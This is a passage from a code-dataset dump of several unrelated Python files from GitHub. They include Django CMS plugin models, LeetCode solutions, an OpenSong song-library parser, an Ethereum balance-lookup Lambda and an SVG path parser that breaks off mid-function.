Colour\"),\n null=True,\n blank=True\n )\n position_text = models.PositiveSmallIntegerField(\n verbose_name=_(\"Text's Position\"),\n choices=CHOICE_POS_TEXT,\n default=3\n )\n btn_label = models.CharField(\n verbose_name=_(\"Link's Label\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Facultative. Maximum 255 characters.\")\n )\n btn_url = models.CharField(\n verbose_name=_(\"URL\"),\n max_length=1000,\n blank=True,\n null=True,\n help_text=_(\"Facultative. Maximum 1 000 characters.\")\n )\n btn_blank = models.BooleanField(\n verbose_name=_(\"Open on new tab?\"),\n default=False\n )\n bg_color = ColorField(\n verbose_name=_(\"Background's Colour\"),\n null=True,\n blank=True\n )\n image = image.FilerImageField(\n verbose_name=_(\"Image\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_sliderchild_image\",\n null=True,\n blank=True,\n help_text=_(\"Maximum size: 1920x900. Leave blank to hide image.\")\n )\n\n\nclass dmBlocContact(CMSPlugin):\n horaire_top = models.CharField(\n verbose_name=_(\"Schedule - Top\"),\n max_length=50,\n null=False,\n blank=False,\n help_text=_(\"Maximum 50 characters.\")\n )\n horaire_bot = models.CharField(\n verbose_name=_(\"Schedule - Bottom\"),\n max_length=50,\n null=False,\n blank=False,\n help_text=_(\"Maximum 50 characters.\")\n )\n phone_top = models.CharField(\n verbose_name=_(\"Phone - Top\"),\n max_length=50,\n null=False,\n blank=False,\n help_text=_(\"Maximum 50 characters.\")\n )\n phone_bot = models.CharField(\n verbose_name=_(\"Phone - Bottom\"),\n max_length=50,\n default=\"Call Us\",\n null=False,\n blank=False,\n help_text=_(\"Maximum 50 characters.\")\n )\n where_top = models.CharField(\n verbose_name=_(\"Address - Top\"),\n max_length=120,\n null=False,\n blank=False,\n help_text=_(\"Maximum 120 characters.\")\n )\n where_bot = models.CharField(\n verbose_name=_(\"Address - Bottom\"),\n max_length=50,\n default=\"Our Address\",\n null=False,\n blank=False,\n help_text=_(\"Maximum 50 characters.\")\n )\n link_label = models.CharField(\n verbose_name=_(\"Button's Label\"),\n max_length=50,\n default=\"Contact Us\",\n null=False,\n blank=False,\n help_text=_(\"Maximum 50 characters.\")\n )\n text_color = ColorField(\n verbose_name=_(\"Text's Colour\"),\n null=True,\n blank=True\n )\n bg_color = ColorField(\n verbose_name=_(\"Background's Colour\"),\n null=True,\n blank=True\n )\n\n\nclass dmInfolettre(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Facultative. Maximum 255 characters.\")\n )\n title_color = ColorField(\n verbose_name=_(\"Title's Colour\"),\n null=True,\n blank=True\n )\n subtitle = models.CharField(\n verbose_name=_(\"Subtitle\"),\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Facultative. Maximum 1000 characters.\")\n )\n subtitle_color = ColorField(\n verbose_name=_(\"Subtitle's Colour\"),\n null=True,\n blank=True\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True,\n help_text=_(\"Facultative.\")\n )\n text_color = ColorField(\n verbose_name=_(\"Text's Colour\"),\n null=True,\n blank=True\n )\n label = models.CharField(\n verbose_name=_(\"Button's Label\"),\n max_length=255,\n default=\"Subscribe to our newsletter\",\n null=False,\n blank=False,\n help_text=_(\"Maximum 255 characters.\")\n )\n image = image.FilerImageField(\n verbose_name=_(\"Image\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_infolettre_image\",\n null=True,\n blank=True,\n help_text=_(\"Facultative. Size: 2000x900. Leave blank to hide image.\")\n )\n bg_color = ColorField(\n verbose_name=_(\"Background's Colour\"),\n null=True,\n blank=True\n )\n\n\nclass dmBlocEtapesParent(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n subtitle = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True\n )\n\n\nclass dmBlocEtapesChild(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text = models.CharField(\n verbose_name=_(\"Text\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n image = image.FilerImageField(\n verbose_name=_(\"Image\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_etapeschild_image\",\n null=True,\n blank=True,\n help_text=_(\"Facultative. Size: 160x160.\")\n )\n\n\nclass dmBlockSalesParent(CMSPlugin):\n CHOIX_PERLINE = [\n (1, _(\"1 block\")),\n (2, _(\"2 blocks\")),\n (3, _(\"3 blocks\"))\n ]\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True\n )\n perline = models.PositiveSmallIntegerField(\n verbose_name=_(\"How many block per line?\"),\n choices=CHOIX_PERLINE,\n default=2,\n null=False,\n blank=False\n )\n\n\nclass dmBlockSalesChild(CMSPlugin):\n CHOIX_POSITION = [\n (0, _(\"Left\")),\n (1, _(\"Right\"))\n ]\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Maximum 1000 characters.\")\n )\n text = models.CharField(\n verbose_name=_(\"Text\"),\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Maximum 1000 characters.\")\n )\n txt_color = ColorField(\n verbose_name=_(\"Text's Colour\"),\n default=\"#292b2c\"\n )\n text_position = models.PositiveSmallIntegerField(\n verbose_name=_(\"Text's Position\"),\n choices=CHOIX_POSITION,\n default=1,\n null=False,\n blank=False\n )\n btn_label = models.CharField(\n verbose_name=_(\"Button's Label\"),\n max_length=100,\n null=True,\n blank=True,\n help_text=_(\"Maximum 100 characters.\")\n )\n btn_url = models.CharField(\n verbose_name=_(\"Button's URL\"),\n max_length=1000,\n null=True,\n blank=True\n )\n btn_text_color = ColorField(\n verbose_name=_(\"Button Text's Colour\"),\n default=\"#292b2c\"\n )\n btn_border_color = ColorField(\n verbose_name=_(\"Button Border's Colour\"),\n null=True,\n blank=True,\n help_text=_(\"Leave blank to use transparent.\")\n )\n btn_bg_color = ColorField(\n verbose_name=_(\"Button Background's Colour\"),\n null=True,\n blank=True,\n help_text=_(\"Leave blank to use transparent.\")\n )\n bg_color = ColorField(\n verbose_name=_(\"Background's Colour\"),\n default=\"#f2f2f3\"\n )\n image = image.FilerImageField(\n verbose_name=_(\"Image\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_saleschild_image\",\n null=True,\n blank=True,\n help_text=_(\"Facultative. Size: 540x300.\")\n )\n\n\nclass dmBlockCalltoaction(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Maximum 1000 characters.\")\n )\n subtitle = models.CharField(\n verbose_name=_(\"Subtitle\"),\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Maximum 1000 characters.\")\n )\n text = models.CharField(\n verbose_name=_(\"Text\"),\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Maximum 1000 characters.\")\n )\n title_color = ColorField(\n verbose_name=_(\"Title's Colour\"),\n default=\"#292b2c\"\n )\n subtitle_color = ColorField(\n verbose_name=_(\"Subtitle's Colour\"),\n default=\"#292b2c\"\n )\n text_color = ColorField(\n verbose_name=_(\"Text's Colour\"),\n default=\"#292b2c\"\n )\n btn_label = models.CharField(\n verbose_name=_(\"Button's Label\"),\n max_length=100,\n null=True,\n blank=True,\n help_text=_(\"Maximum 100 characters.\")\n )\n btn_url = models.CharField(\n verbose_name=_(\"Button's URL\"),\n max_length=1000,\n null=True,\n blank=True\n )\n bg_color = ColorField(\n verbose_name=_(\"Background's Colour\"),\n null=True,\n blank=True\n )\n image = image.FilerImageField(\n verbose_name=_(\"Image\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_calltoaction_image\",\n null=True,\n blank=True,\n help_text=_(\"Facultative. Size: 420x460.\")\n )\n\n\nclass dmTeamParent(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True\n )\n\n\nclass dmTeamChild(CMSPlugin):\n name = models.CharField(\n verbose_name=_(\"Name\"),\n max_length=255,\n null=False,\n blank=False,\n help_text=_(\"Maximum 255 characters.\")\n )\n job = models.CharField(\n verbose_name=_(\"Job\"),\n max_length=1000,\n null=True,\n blank=True\n )\n photo = image.FilerImageField(\n verbose_name=_(\"Photo\"),\n related_name=\"team_photo\",\n on_delete=models.SET_NULL,\n null=True,\n blank=True,\n help_text=_(\"Facultative. Size: 255x355.\")\n )\n email = models.EmailField(\n verbose_name=_(\"Email\"),\n max_length=1000,\n null=True,\n blank=True\n )\n facebook = models.URLField(\n verbose_name=\"Facebook\",\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Ex.: https://www.facebook.com/\")\n )\n twitter = models.URLField(\n verbose_name=\"Twitter\",\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Ex.: https://twitter.com/\")\n )\n instagram = models.URLField(\n verbose_name=\"Instagram\",\n max_length=1000,\n null=True,\n blank=True,\n help_text=_(\"Ex.: https://www.instagram.com/\")\n )\n\n\nclass dmTestimonialParent(CMSPlugin):\n title = models.CharField(\n verbose_name=_(\"Title\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True\n )\n bg_color = ColorField(\n verbose_name=_(\"Background's Colour\"),\n null=True,\n blank=True\n )\n bg_image = image.FilerImageField(\n verbose_name=_(\"Background's Image\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_testimonialparent_bgimage\",\n null=True,\n blank=True,\n help_text=_(\"Facultative. Size: 2000x900.\")\n )\n\n\nclass dmTestimonialChild(CMSPlugin):\n name = models.CharField(\n verbose_name=_(\"Name\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n name_color = ColorField(\n verbose_name=_(\"Name's Colour\"),\n default=\"#292b2c\"\n )\n job = models.CharField(\n verbose_name=_(\"Job\"),\n max_length=255,\n null=True,\n blank=True,\n help_text=_(\"Maximum 255 characters.\")\n )\n job_color = ColorField(\n verbose_name=_(\"Job's Colour\"),\n default=\"#292b2c\"\n )\n photo = image.FilerImageField(\n verbose_name=_(\"Photo\"),\n on_delete=models.SET_NULL,\n related_name=\"dmplugin_testimonialchild_photo\",\n null=True,\n blank=True,\n help_text=_(\"Facultative. Size: 120x120.\")\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True\n )\n","repo_name":"dmodules/d-shop","sub_path":"dshop/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":73137,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"8225622544","text":"# 287. Find the Duplicate Number\n# Medium\n\n# Given an array nums containing n + 1 integers where each integer is between 1 and n (inclusive), prove that at least one duplicate number must exist. Assume that there is only one duplicate number, find the duplicate one.\n\n# Example 1:\n\n# Input: [1,3,4,2,2]\n# Output: 2\n# Example 2:\n\n# Input: [3,1,3,4,2]\n# Output: 3\n\n## I ##\nclass Solution(object):\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # Cyclic Sort\n i = 0\n while i < len(nums):\n # What number is expected at i?\n expected = i + 1\n if expected != nums[i]:\n # What index should the number be at?\n index = nums[i] - 1\n if nums[index] != nums[i]: # swap\n nums[index], nums[i] = nums[i], nums[index]\n else: # Found the duplicate\n return nums[i]\n else:\n i += 1\n\n return -1\n\n## II ##\nclass Solution(object):\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # Floyd's Algorithm\n tortoise, hare = nums[0], nums[0]\n\n while True:\n tortoise = nums[tortoise]\n hare = nums[nums[hare]]\n\n if tortoise == hare:\n break\n\n ptr1 = nums[0]\n ptr2 = tortoise\n\n while ptr1 != ptr2:\n ptr1 = nums[ptr1]\n ptr2 = nums[ptr2]\n\n return ptr1\n","repo_name":"atolat/algorithms-lc","sub_path":"Strings-Arrays/Cyclic Sort/duplicate-number.py","file_name":"duplicate-number.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14951999950","text":"#!/usr/bin/env python3\nimport os\nfrom xml.etree import ElementTree as ET\nfrom datetime import datetime\n\n\nclass Set():\n name = ''\n path = ''\n songs = []\n\n def __repr__(self):\n return '{}, {}, {}'.format(self.name, self.path, self.songs)\n\n def __init__(self, setpath):\n # print('opening set:', setpath)\n if not os.path.exists(setpath):\n return\n xml = ET.parse(setpath)\n root = xml.getroot()\n self.path = setpath\n self.name = root.attrib['name']\n self.songs = []\n slide_groups = xml.find('slide_groups')\n for slide_group in slide_groups:\n songpath = ''\n if slide_group.attrib['type'] == 'song':\n name = slide_group.attrib['name']\n try:\n subdir = slide_group.attrib['path']\n except:\n subdir = ''\n if subdir != '':\n songpath = os.path.join(songsdir, subdir, name)\n else:\n songpath = os.path.join(songsdir, name)\n if songpath != '':\n # print(songpath)\n song = Song(songpath)\n # print(song.name)\n if (song.name != ''):\n self.songs.append(song)\n # print(self.name)\n # print(self.songs)\n\n\nclass Song():\n path = ''\n lyrics = ''\n name = ''\n ccli = ''\n data = {}\n\n def __init__(self, songpath):\n # print('opening song:', songpath)\n if not os.path.exists(songpath):\n return\n xml = ET.parse(songpath)\n song = xml.getroot()\n self.path = songpath\n\n self.data = {}\n for element in song:\n # print(element.tag)\n # print(element.text)\n # print(element.attrib)\n self.data[element.tag] = element.text\n self.name = self.data['title']\n self.lyrics = self.data['lyrics']\n self.ccli = self.data['ccli']\n\n\nclass SongFolder():\n path = ''\n songs = []\n subfolders = []\n name = ''\n\n def __init__(self, folderpath):\n self.path = folderpath\n self.name = os.path.basename(folderpath)\n if not os.path.exists(folderpath):\n return\n\n for item in os.listdir(self.path):\n if '.' == item[0]:\n continue\n fp = os.path.join(self.path, item)\n if os.path.isdir(fp):\n self.subfolders.append(SongFolder(fp))\n else:\n self.songs.append(Song(fp))\n\n\nclass Library():\n sets = {}\n songfolder = None\n songstats = {}\n\n def __init__(self, new_librarypath):\n global setsdir\n global songsdir\n self.librarypath = new_librarypath\n\n setsdir = os.path.join(self.librarypath, 'Sets')\n songsdir = os.path.join(self.librarypath, 'Songs')\n self.songfolder = SongFolder(songsdir)\n\n # create sets listing\n for root, dirs, files in os.walk(setsdir):\n for basename in files:\n pathname = os.path.join(root, basename)\n try:\n songset = Set(pathname)\n except:\n # print(\"could not parse\", basename)\n continue\n name = songset.name\n\n try:\n datestamp = datetime.strptime(name, \"%Y-%m-%d\")\n except:\n continue\n if datestamp < datetime.strptime(\"2012-01-01\", \"%Y-%m-%d\"):\n continue\n\n self.sets[datestamp] = songset\n\n for song in songset.songs:\n if song.path == '':\n continue\n self.songs.append(song)\n songpath = song.path\n\n name = os.path.basename(songpath)\n if name not in self.songstats:\n self.songstats[name] = {\n \"uses\": 1, 'author': song.data['author'], 'copyright': song.data['copyright']}\n else:\n self.songstats[name]['uses'] += 1\n","repo_name":"jeffmikels/OpenSongTools","sub_path":"OpenSong.py","file_name":"OpenSong.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29056447358","text":"import json\nimport urllib3\n\ndef lambda_handler(event, context):\n address = str(event['address']).lower()\n #address = '0xb2930B35844a230f00E51431aCAe96Fe543a0347'\n pool = urllib3.PoolManager()\n params = '{\"jsonrpc\":\"2.0\",\"method\":\"eth_getBalance\",\"params\":[\"' + address + '\", \"latest\"],\"id\":1}'\n \n r = pool.urlopen(\n method='POST', \n url='https://cloudflare-eth.com', \n headers={'Content-Type':'application/json'}, \n body=params\n ).data\n \n return {\n 'balance': int(json.loads(r)[\"result\"], 16)/10**18\n }","repo_name":"lana-shanghai/blockchain-lambda-api","sub_path":"lambda handlers/balance.py","file_name":"balance.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40837888736","text":"import typing as _typing\r\n\r\n\r\nfrom collections import *\r\nfrom collections import abc\r\n\r\nfrom . import abc_recipes, mapping_recipes\r\nfrom .filedict import *\r\nfrom .collections_recipes import *\r\n \r\n#5/6/2022-14/7/2022 tested with mypy\r\n\r\n\r\n\r\n\r\n\r\nif _typing.TYPE_CHECKING: #to please mypy and so it correctly see the content of the module\r\n __all__ = [\r\n 'LastUpdatedOrderedDict',\r\n 'SerializerDictConfig',\r\n 'collections_recipes',\r\n 'FileSerializerDict',\r\n 'LineSeekableFile',\r\n 'MultiHitLRUCache',\r\n 'constant_factory',\r\n 'mapping_recipes',\r\n 'FileDictPickle',\r\n 'OrderedCounter',\r\n 'SortedSequence',\r\n 'TimeBoundedLRU',\r\n 'moving_average',\r\n 'SQLPickleDict',\r\n 'BaseFileDict',\r\n 'DeepChainMap',\r\n 'FileDictJson',\r\n 'ListBasedSet',\r\n 'FileDictExt',\r\n 'OrderedDict',\r\n 'SQLJsonDict',\r\n 'abc_recipes',\r\n 'defaultdict',\r\n 'FolderDict',\r\n 'OrderedSet',\r\n 'UserString',\r\n 'delete_nth',\r\n 'namedtuple',\r\n 'roundrobin',\r\n 'RangedSet',\r\n 'chr_range',\r\n 'cr_typing',\r\n 'ChainMap',\r\n 'ChainSet',\r\n 'FileDict',\r\n 'UserDict',\r\n 'UserList',\r\n 'filedict',\r\n 'Counter',\r\n 'SQLDict',\r\n 'BitSet',\r\n 'deque',\r\n 'tail',\r\n 'LRU',\r\n 'abc'\r\n ]","repo_name":"copperfield42/copperfield-s-python-libraries","sub_path":"src/collections_recipes/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33293858976","text":"class Solution(object):\n def rotate(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n nums_temp = nums * 2\n n = len(nums)\n return [i for i in nums_temp[n - k : 2 * n - k]]\n\n\nprint(Solution().rotate([-1, -100, 3, 99], 2))\n# 输出和本地不一致?\n","repo_name":"CatCell/note","sub_path":"code/arrDimen1/# rotate.py","file_name":"# rotate.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26367768106","text":"#!/usr/bin/env python\n\nfrom lxml import etree\n\nfrom .svglib import bezmisc\nfrom .svglib import cubicsuperpath\nfrom .svglib import ffgeom\nfrom .svglib import inkex\nfrom .svglib import simplepath\nfrom .svglib import simpletransform\n\nfrom collections import namedtuple\nPoint_Tuple = namedtuple('Point_Tuple', ('b0', 'b1', 'b2', 'b3'))\nPoint = namedtuple('Point', ('x', 'y'))\n\nimport six\nif six.PY3:\n basestring = str\n\n\nclass SvgEntity(object):\n \"\"\"\n Base class for SVG entities.\n \"\"\"\n def __init__(self, node, node_transform):\n pass\n\n\nclass SvgIgnored(SvgEntity):\n \"\"\"\n An SVG entity which will not be rendered.\n \"\"\"\n def __init__(self, node, node_transform):\n self.tag = node.tag\n\n\nclass SvgPath(SvgEntity):\n \"\"\"\n An SVG entity which will render a segmented line.\n \"\"\"\n def __init__(self, node, node_transform):\n d = node.get('d')\n\n path = simplepath.parsePath(d)\n\n if len(path) == 0:\n return\n \n path = cubicsuperpath.CubicSuperPath(path)\n simpletransform.applyTransformToPath(node_transform, path)\n\n # path is now a list of lists of cubic beziers [ctrl p1, ctrl p2, endpoint]\n # where the start-point is the endpoint of the previous segment\n self.segments = []\n \n for cubic_bezier_path in path:\n points = []\n \n self._subdivide_cubic_bezier_path(cubic_bezier_path, 0.2) # TODO: smoothness preference\n\n for p1, p2, endpoint in cubic_bezier_path:\n points.append(p2)\n \n self.segments.append(points)\n\n def _compute_max_distance(self, points):\n \"\"\"\n Compute the max distance between four points.\n \"\"\"\n ((p0x, p0y), (p1x, p1y), (p2x, p2y), (p3x, p3y)) = points\n\n p0 = ffgeom.Point(p0x, p0y)\n p1 = ffgeom.Point(p1x, p1y)\n p2 = ffgeom.Point(p2x, p2y)\n p3 = ffgeom.Point(p3x, p3y)\n\n s1 = ffgeom.Segment(p0, p3)\n\n return max(s1.distanceToPoint(p1), s1.distanceToPoint(p2))\n\n def _subdivide_cubic_bezier_path(self, cubic_bezier_path, flat):\n \"\"\"\n Break up a bezier curve into smaller curves, each of which\n is approximately a straight line within a given tolerance\n (the \"smoothness\" defined by [flat]).\n\n This is a modified version of Inkscape's cspsubdiv.cspsubdiv().\n The recursive call has been rewritten because it caused\n recursion-depth errors on complicated line segments.\n \"\"\"\n i = 1\n\n while True:\n while True:\n if i >= len(cubic_bezier_path):\n return\n\n # First bezier, first control point \n p0 = cubic_bezier_path[i - 1][1]\n\n # First bezier, endpoint\n p1 = cubic_bezier_path[i - 1][2]\n\n # Second bezier, Second control point\n p2 = cubic_bezier_path[i][0]\n\n # Second bezier, first control point\n p3 = cubic_bezier_path[i][1]\n\n # b = (p0, p1, p2, p3)\n b = Point_Tuple(Point(p0[0], p0[1]), Point(p1[0], p1[1]), Point(p2[0], p2[1]), Point(p3[0], p3[1]))\n\n if self._compute_max_distance(b) > flat:\n break\n\n i += 1\n\n one, two = bezmisc.beziersplitatt(b, 0.5)\n cubic_bezier_path[i - 1][2] = one[1]\n cubic_bezier_path[i][0] = two[2]\n p = [one[2], one[3], two[1]]\n cubic_bezier_path[i:1] = [p]\n\n def new_path_from_node(self, node):\n newpath = etree.Element(inkex.addNS('path', 'svg'))\n\n node_style = node.get('style')\n \n if node_style:\n newpath.set('style', node_style)\n \n transform = node.get('transform')\n \n if transform:\n newpath.set('transform', transform)\n \n return newpath\n\n\nclass SvgRect(SvgPath):\n \"\"\"\n An SVG entity will render a rectangle.\n \"\"\"\n def __init__(self, node, node_transform):\n newpath = self.new_path_from_node(node)\n\n x = float(node.get('x'))\n y = float(node.get('y'))\n width = node.get('width')\n if width.endswith(\"%\"):\n w = float(width[:-1])\n else:\n w = float(width)\n height = node.get('height')\n if height.endswith(\"%\"):\n h = float(height[:-1])\n else:\n h = float(height)\n # w = float(node.get('width'))\n # h = float(node.get('height'))\n\n a = []\n a.append(['M ', [x, y]])\n a.append([' l ', [w, 0]])\n a.append([' l ', [0, h]])\n a.append([' l ', [-w, 0]])\n a.append([' Z', []])\n\n newpath.set('d', simplepath.formatPath(a))\n \n SvgPath.__init__(self, newpath, node_transform)\n\n\nclass SvgLine(SvgPath):\n \"\"\"\n An SVG entity that renders a line.\n \"\"\"\n def __init__(self, node, node_transform):\n newpath = self.new_path_from_node(node)\n\n x1 = float(node.get('x1'))\n y1 = float(node.get('y1'))\n x2 = float(node.get('x2'))\n y2 = float(node.get('y2'))\n\n a = []\n a.append(['M ', [x1, y1]])\n a.append([' L ', [x2, y2]])\n\n newpath.set('d', simplepath.formatPath(a))\n \n SvgPath.__init__(self, newpath, node_transform)\n\n\nclass SvgPolyLine(SvgPath):\n \"\"\"\n An SVG entity that renders as a segmented line.\n \"\"\"\n def __init__(self, node, node_transform):\n newpath = self.new_path_from_node(node)\n pl = node.get('points', '').strip()\n\n if pl == '':\n return\n \n pa = pl.split()\n \n if not len(pa):\n return\n\n d = \"M \" + pa[0]\n \n for i in range(1, len(pa)):\n d += \" L \" + pa[i]\n \n newpath.set('d', d)\n \n SvgPath.__init__(self, newpath, node_transform)\n\n\nclass SvgEllipse(SvgPath):\n \"\"\"\n An SVG entity that renders an ellipse.\n \"\"\"\n def __init__(self, node, node_transform):\n rx = float(node.get('rx', '0'))\n ry = float(node.get('ry', '0'))\n\n newpath = self.make_ellipse_path(rx, ry, node)\n \n SvgPath.__init__(self, newpath, node_transform)\n\n def make_ellipse_path(self, rx, ry, node):\n if rx == 0 or ry == 0:\n return None\n \n cx = float(node.get('cx', '0'))\n cy = float(node.get('cy', '0'))\n\n x1 = cx - rx\n x2 = cx + rx\n\n d = 'M %f,%f ' % (x1, cy) + \\\n 'A %f,%f ' % (rx, ry) + \\\n '0 1 0 %f, %f ' % (x2, cy) + \\\n 'A %f,%f ' % (rx, ry) + \\\n '0 1 0 %f,%f' % (x1, cy)\n\n newpath = self.new_path_from_node(node)\n newpath.set('d', d)\n\n return newpath\n\n\nclass SvgCircle(SvgEllipse):\n \"\"\"\n An SVG entity that renders as an ellipse.\n \"\"\"\n def __init__(self, node, node_transform):\n rx = float(node.get('r', '0'))\n\n newpath = self.make_ellipse_path(rx, rx, node)\n\n SvgPath.__init__(self, newpath, node_transform)\n\n\nclass SvgText(SvgIgnored):\n \"\"\"\n An SVG entity that renders as text.\n \"\"\"\n def __init__(self, node, node_transform):\n print('unable to draw text. please convert it to a path first.')\n\n SvgIgnored.__init__(self, node, node_transform)\n\n\nclass SvgLayerChange(SvgEntity):\n \"\"\"\n An SVG entity that stands in for a delay between layer changes.\n \"\"\"\n def __init__(self, layer_name):\n self.layer_name = layer_name\n\n\nclass SvgParser(object):\n \"\"\"\n Parses an SVG.\n \"\"\"\n entity_map = {\n 'path': SvgPath,\n 'rect': SvgRect,\n 'line': SvgLine,\n 'polyline': SvgPolyLine,\n 'polygon': SvgPolyLine,\n 'circle': SvgCircle,\n 'ellipse': SvgEllipse,\n 'pattern': SvgIgnored,\n 'metadata': SvgIgnored,\n 'defs': SvgIgnored,\n 'eggbot': SvgIgnored,\n ('namedview', 'sodipodi'): SvgIgnored,\n 'text': SvgText\n }\n\n def __init__(self, svg):\n self.svg = svg\n self.entities = []\n\n def parseLengthWithUnits(self, attr):\n \"\"\" \n Parse an SVG value which may or may not have units attached\n This version is greatly simplified in that it only allows: no units,\n units of px, and units of %. Everything else, it returns None for.\n There is a more general routine to consider in scour.py if more\n generality is ever needed.\n \"\"\"\n unit = 'px'\n attr = attr.strip()\n # print(\"attr: {}\".format(attr))\n if attr[-2:] == 'px' \\\n or attr[-2:] == 'pt' \\\n or attr[-2:] == 'px':\n attr = attr[:-2]\n elif attr[-1:] == '%':\n unit = '%'\n attr = attr[:-1]\n\n try:\n value = float(attr)\n except:\n return None, None\n \n return value, unit\n\n def getLength(self, name, default):\n \"\"\" \n Get the attribute with name \"name\" and default value \"default\"\n Parse the attribute into a value and associated units. Then, accept\n no units (''), units of pixels ('px'), and units of percentage ('%').\n \"\"\"\n attr = self.svg.get(name)\n \n if attr:\n value, unit = self.parseLengthWithUnits(attr)\n if not value:\n # Couldn't parse the value\n return None\n elif (unit == '') or (unit == 'px') or (unit == 'mm') or (unit == 'pt'):\n # print (\"name: {}, unit: {}\".format(name, unit))\n return value\n elif unit == '%':\n return float(default) * value / 100.0\n else:\n # Unsupported units\n return None\n else:\n # No width specified; assume the default value\n return float(default)\n\n def parse(self):\n \"\"\"\n Parse the SVG data into entities.\n \"\"\"\n # 0.28222 scale determined by comparing pixels-per-mm in a default Inkscape file.\n # print (\"Width: {}\" .format(self.getLength('width', 354)))\n\n # width = self.getLength('width', 354) * 0.28222\n # height = self.getLength('height', 354) * 0.28222\n #\n # self.recursivelyTraverseSvg(\n # self.svg,\n # [\n # [0.28222, 0.0, -(width / 2.0)],\n # [0.0, -0.28222, (height / 2.0)]\n # ])\n\n width = self.getLength('width', 800) * 0.62 # 0.522\n height = self.getLength('height', 400) * 0.62 # 0.522\n self.recursivelyTraverseSvg(\n self.svg,\n [\n [0.62, 0.0, -(width / 2.0)],\n [0.0, -0.62, (height / 2.0)]\n ])\n\n def recursivelyTraverseSvg(self, nodeList, current_transform=[[1.0, 0.0, 0.0], [0.0, -1.0, 0.0]], parent_visibility='visible'):\n \"\"\"\n Recursively traverse the svg file to plot out all of the\n paths. The function keeps track of the composite transformation\n that should be applied to each path.\n\n This function handles path, group, line, rect, polyline, polygon,\n circle, ellipse and use (clone) elements. Notable elements not\n handled include text. Unhandled elements should be converted to\n paths in Inkscape.\n \"\"\"\n for node in nodeList:\n # Ignore invisible nodes\n node_visibility = node.get('visibility', parent_visibility)\n\n if node_visibility == 'inherit':\n node_visibility = parent_visibility\n\n if node_visibility == 'hidden' or node_visibility == 'collapse':\n pass\n\n # Apply the current matrix transform to this node's transform\n node_transform = simpletransform.composeTransform(current_transform, simpletransform.parseTransform(node.get('transform')))\n\n # Root and group tags\n if node.tag == inkex.addNS('g', 'svg') or node.tag == 'g':\n if (node.get(inkex.addNS('groupmode', 'inkscape')) == 'layer'):\n layer_name = node.get(inkex.addNS('label', 'inkscape'))\n \n self.entities.append(SvgLayerChange(layer_name))\n \n self.recursivelyTraverseSvg(node, node_transform, parent_visibility=node_visibility)\n # Use tags\n elif node.tag == inkex.addNS('use', 'svg') or node.tag == 'use':\n refid = node.get(inkex.addNS('href', 'xlink'))\n \n if 